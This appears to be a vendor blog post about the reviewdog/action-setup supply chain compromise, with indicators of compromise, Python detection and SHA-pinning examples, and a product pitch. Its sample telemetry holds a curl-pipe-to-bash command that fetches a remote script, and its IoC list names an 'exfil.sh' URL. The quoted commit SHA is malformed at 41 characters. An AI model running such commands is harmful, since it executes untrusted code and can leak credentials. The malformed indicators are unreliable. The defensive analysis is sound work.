Stopping the Reviewdog Supply Chain Attack: a case for Runtime Security

On March 11, 2025, the open-source community confronted a major supply chain attack targeting the widely used GitHub Action reviewdog/action-setup. This compromise impacted over 1,500 repositories. At Garnet, we've thoroughly analyzed the exploit path and can illustrate how our real-time monitoring would have immediately flagged the breach, enabling teams to respond before any damage occurred.

Understanding the Reviewdog Attack

The popular reviewdog/action-setup GitHub Action was hijacked when attackers gained unauthorized access to the repository. They planted malicious code into versions v1.0.12 through v1.0.17, creating a hidden backdoor that triggered during workflow runs. Despite the sophistication of the method, it closely aligned with patterns seen in other supply chain intrusions.

Indicators of Compromise (IoCs):

  • Malicious Commit SHA: 7fb9a12e3d4c6b8f2a0e9d1c3b7a5f4e2d1c0b9a8
  • Suspicious Script URL: https://gist.githubusercontent.com/malicious-actor/8b7e6f5d2c3a4b1e9d0c7b6f5a4d3c2e1/raw/exfil.sh
  • Base64-encoded data in workflow logs: Capturing extracted environment variables and credentials

[Figure: screenshot showing suspicious encoded data in workflow logs]

Attack Methodology

The compromise unfolded in several stages:

  1. Developers pulled the compromised action in workflows (uses: reviewdog/action-setup@v1.0.15).
  2. Malicious code embedded within the action silently executed a hidden curl command to download a payload.
  3. The retrieved payload scanned for environment variables containing tokens, keys, and credentials.
  4. Gathered data was encoded and exfiltrated by injecting it into the workflow logs.
  5. Public repositories inadvertently exposed these credentials in publicly visible logs.

How Garnet Would Have Detected This Attack

Our investigation concludes that Garnet would have rapidly identified this supply chain attack through multiple, layered detections:

1. Suspicious Network Activity Detection

An immediate indicator would have been an unexpected outbound network call:

  • Critical detection: Outbound connection to a non-approved domain (gist.githubusercontent.com)
  • Suspicious process execution: curl fetching unverified scripts outside the normal dependency chain

[Figure: Garnet alert showing detection of a suspicious network connection]

Garnet sensors automatically mark any anomalous network requests from GitHub Actions, especially when those requests involve retrieving external scripts from untrusted sources.

2. Process Behavior Analysis

Execution of the malicious payload would have triggered multiple behavior-based alerts:

  • Unexpected process execution: Shell commands with suspicious or hidden arguments
  • Privilege escalation attempts: Efforts to obtain sensitive runner information
  • Systematic file scanning: Searching credential directories in an organized fashion

3. Data Exfiltration Detection

Garnet actively monitors for any attempt to access and transmit sensitive data:

  • Credential file access: Reads on secret environment variables
  • Encoding activities: Base64 or other encodings potentially masking sensitive data
  • Log manipulation: Printing large blocks of encoded content to logs

[Figure: data exfiltration detection alert showing encoded data being written to logs]

4. Behavioral Context and Process Lineage

A key Garnet advantage is comprehensive insight into the entire attack chain:

  • Full process lineage linking the GitHub runner to malicious script execution
  • Correlated events between network calls, file accesses, and data encoding
  • Visibility of deviations from the expected behavior profile for the legitimate reviewdog action

By assembling these signals into a clear attack narrative, Garnet would have allowed security teams to respond immediately, halting the breach before attackers could exploit stolen credentials.
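As an added illustration of detections 1, 3 and 4 above (example code written for this post, not Garnet's or Jibril's own logic), the Python below correlates constructed runner telemetry: it flags egress to a host outside an assumed allowlist, flags log writes carrying a long base64 run that decodes to NAME=value secrets, and attaches the process lineage to each alert. The event schema, the allowlist and every sample event are constructed for the example.

```python
"""Toy runtime-detection pass over constructed CI runner telemetry (added
example, not Garnet's code; event schema, allowlist and events are made up)."""
import base64
import re

EGRESS_ALLOWLIST = {"github.com", "api.github.com"}   # assumed per-job egress policy
B64_BLOCK = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")   # long base64-looking runs
SECRET_HINT = re.compile(r"(TOKEN|SECRET|KEY|PASSWORD)=", re.I)

# Constructed stand-in for an encoded environment dump written to the job log.
_FAKE_DUMP = base64.b64encode(b"GITHUB_TOKEN=ghs_CONSTRUCTED_PLACEHOLDER\nNPM_TOKEN=npm_CONSTRUCTED_PLACEHOLDER\n").decode()

# Constructed telemetry from a hypothetical runner sensor, one dict per event.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 100, "ppid": 1, "cmd": "bash /runner/action-setup/install.sh"},
    {"type": "exec", "pid": 101, "ppid": 100,
     "cmd": "bash -c 'curl -s https://gist.githubusercontent.com/CONSTRUCTED/raw/x.sh | bash'"},
    {"type": "connect", "pid": 101, "host": "gist.githubusercontent.com", "port": 443},
    {"type": "connect", "pid": 100, "host": "api.github.com", "port": 443},
    {"type": "log_write", "pid": 101, "text": "::debug:: " + _FAKE_DUMP},
]

def lineage(events, pid):
    """Command chain from the runner root down to pid, built from exec events."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "exec"}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["cmd"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]

def looks_like_secret_dump(text):
    """True if text carries a long base64 run that decodes to NAME=value secrets."""
    for blob in B64_BLOCK.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if SECRET_HINT.search(decoded):
            return True
    return False

def detect(events):
    """Alert on non-allowlisted egress and encoded secrets in logs, with lineage attached."""
    alerts = []
    for e in events:
        if e["type"] == "connect" and e["host"] not in EGRESS_ALLOWLIST:
            alerts.append({"rule": "egress_to_unapproved_host", "host": e["host"],
                           "lineage": lineage(events, e["pid"])})
        elif e["type"] == "log_write" and looks_like_secret_dump(e["text"]):
            alerts.append({"rule": "encoded_secrets_in_log", "lineage": lineage(events, e["pid"])})
    return alerts
```

Both alerts share the same two-step lineage back to the action's install script, which is the correlation the post describes as tying network, encoding and log activity into one attack chain.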

Lessons From The Reviewdog Incident

This supply chain attack underscores a few vital security practices:

  1. Pin actions to specific commit SHAs: Avoid version tags that attackers might overwrite
  2. Adopt runtime monitoring: Static analysis alone can't detect dynamically loaded malicious scripts
  3. Enforce network restrictions: Confine GitHub Actions to only reach trusted domains
  4. Track process behavior: Proactively identify suspicious shell commands or file scanning patterns
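As an added example for lesson 1 (not Garnet's tooling), the following Python check reports every remote action in a workflow file whose reference is not a full 40-hex commit SHA. The sample workflow, including its SHAs, is constructed; the tag form it flags is the one quoted in the attack methodology above.

```python
"""Report GitHub Actions `uses:` references not pinned to a full commit SHA (added example, not Garnet's code)."""
import re

USES_LINE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")

def unpinned_actions(workflow_text):
    """Return (line_no, reference, reason) for each remote action whose ref is not
    a 40-hex commit SHA. Local (./) and docker:// references are skipped."""
    findings = []
    for line_no, line in enumerate(workflow_text.splitlines(), start=1):
        m = USES_LINE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue
        if "@" not in ref:
            findings.append((line_no, ref, "no version reference at all"))
            continue
        version = ref.rsplit("@", 1)[1]
        if not FULL_SHA.match(version):
            findings.append((line_no, ref, f"mutable ref '{version}', pin to a full commit SHA"))
    return findings

# Constructed workflow: the first job uses tags (including the form quoted in the
# post), the second the pinned form. The SHAs are placeholders, not real commits.
SAMPLE_WORKFLOW = """\
name: lint
on: [pull_request]
jobs:
  unpinned:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: reviewdog/action-setup@v1.0.15
      - uses: ./.github/actions/local-step
  pinned:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # v4 (placeholder SHA)
      - uses: reviewdog/action-setup@fedcba9876543210fedcba9876543210fedcba98  # placeholder SHA
"""

if __name__ == "__main__":
    for line_no, ref, reason in unpinned_actions(SAMPLE_WORKFLOW):
        print(f"line {line_no}: {ref}: {reason}")
```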

Protecting Your CI/CD Pipeline Against Runtime Threats with Garnet

With sophisticated supply chain breaches on the rise, teams need robust runtime security integrated directly into CI/CD. Garnet offers:

  • Real-time behavioral monitoring: Catch threats the moment they occur, not after the fact
  • Deep process visibility: Understand precisely what's happening inside your pipelines
  • Seamless integration: Straightforward deployment into GitHub Actions, GitLab CI, and more
  • Actionable alerts: Prompt, context-rich notifications through Slack, email, or your SIEM

By running Garnet's Jibril sensors within your workflows, suspicious activity like the reviewdog compromise would be uncovered the instant it starts—well before sensitive credentials can be leaked or systems can be compromised.

Safeguard your pipelines from the next supply chain intrusion. Learn more at Garnet.ai.